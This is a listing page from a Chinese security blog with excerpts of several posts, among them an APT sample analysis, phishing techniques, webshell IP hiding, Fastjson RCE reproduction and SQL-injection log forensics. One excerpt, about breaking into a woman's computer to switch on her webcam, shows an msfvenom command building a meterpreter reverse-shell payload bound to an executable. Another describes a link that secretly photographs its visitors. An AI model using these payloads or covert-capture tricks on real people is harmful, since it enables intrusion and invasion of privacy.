登陆 注册
  • LuminousMoth样本分析报告

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言2021年7月,卡巴斯基发现一种针对东南亚的攻击活动,被称作LuminoutMoth。该活动至少可以追溯到2020年10月,早期的攻击大多在缅甸但现在主要在菲律宾,目前发现缅甸共有100多名受害者,菲律宾有1,400名受害者,其中一些受害者是政府实体。源头APT组织向受害者发送包含Dropbox下载链接的钓鱼邮件,通过将file_subpath参数设置为...

  • 一次渗透妹子电脑开摄像头全过程

    桑云信息安云桑云信息安云 2021-07-27

    具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe ...

  • 关于快速验证低危与中危漏洞

    桑云信息安云桑云信息安云 2021-07-27

    漏洞是指一个系统存在的弱点或缺陷,系统对特定威胁攻击或危险事件的敏感性,或进行攻击的威胁作用的可能性。按照危害也被分为高、中、低三种。低危X-Frame-Options Header未配置查看请求头中是否存在X-Frame-Options Header字段http://google.com会话Cookie中缺少secure属性(未设置安全标志的Cookie)...

  • 干货 | 邮件钓鱼攻击学习

    桑云信息Lzers桑云信息Lzers 2021-07-27

    前言在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。钓鱼手段Lnk(快捷方式)可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD当我点击谷歌浏览器时,弹出了CMD可以进行更改图标快速...

  • 【防溯源】如何优雅的隐藏你连接 Webshell 的真实 IP

    桑云信息Lzers桑云信息Lzers 2021-07-26

    前言用过云函数的 XD 们都知道,它可以用来帮助我们转发请求,但是这种方法已经被老外玩烂了,但是也很实用!由于它自带 CDN 这样我们每次请求 Webshell 的时候 IP 都是不同的,从而达到隐藏 RT 的效果!还是那句话,一个合格的 RedTeam 被溯源到是很可耻的!如何优雅的隐藏你连接 Webshell 的真实 IP云函数隐藏 Websh...

  • CVE-2021-28316漏洞复现

    桑云信息Lzers桑云信息Lzers 2021-07-21

    前言:这两天有人发了一篇文章给我,这两天趁着下班加班加点看了一下漏洞逻辑,发现这个漏洞贼有意思,就水一篇关于这篇漏洞的原理,实践等五一有空再做吧。1.漏洞利用windows10在锁屏的时候,通过UI界面可以进行无线连接,这时候我们通过伪造恶意无线。(当然这里有另一种玩法就是如果PC有设置为自动连接WIFI,我们伪造SSID也能获取到密码,前提是知道SSID是...

  • 技术分享 | 基于windows操作系统的锦行蜜罐新节点技术

    jinxingjinxing 2021-05-31

    摘要基于诱捕节点,蜜罐可以实现攻击欺骗转移和资产隔离防护。但是现有诱捕节点的实现技术存在IP地址资源的分配和冲突的风险,日常维护要求高,需要配备专业的网管人员,增加人力成本。本文锦行科技提出了一种新的基于windows操作系统的诱捕节点实现技术,利用Libuv库以及采用多进程服务架构技术,在诱捕节点模拟主机网络服务,并通过采用linux虚拟网卡技术的中间层服...

  • 技术分享 | Fastjson-RCE漏洞复现

    Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。影响版本Fast...

  • 在吗宝贝?你点开这个网址看看[打开网站偷拍照片]

    桑云信息Lzers桑云信息Lzers 2021-05-01

    最近忙着开公司,所以一直没有管过黑白网。刷抖音期间,偶然发现是2020年发布的文章点开一个网址我被记录了ip还偷拍了照片,被人实现了具体功能。网恋奔现前先打开网址偷拍个照片看看。趁着5.1空闲,重构了代码,并实现了具体功能。如下图所示图片依然存放于本地img目录,新增了查询功能,毕竟之前只是个思路.其中sc.php为生成路径<script> f...

  • 从Web日志还原SQL注入拖走的数据

    桑云信息Lzers桑云信息Lzers 2021-04-07

    利用SQL注入漏洞拖库,从而导致数据泄漏。一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源。但是,有一个问题却一直困扰着我,攻击者通过SQL注入漏洞到底获取了什么数据?是所有的数据,还只是访问了其中的一张表?理论上,假设所有的url参数请求日志都记录完整的话,只需要重放每一个请...

请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net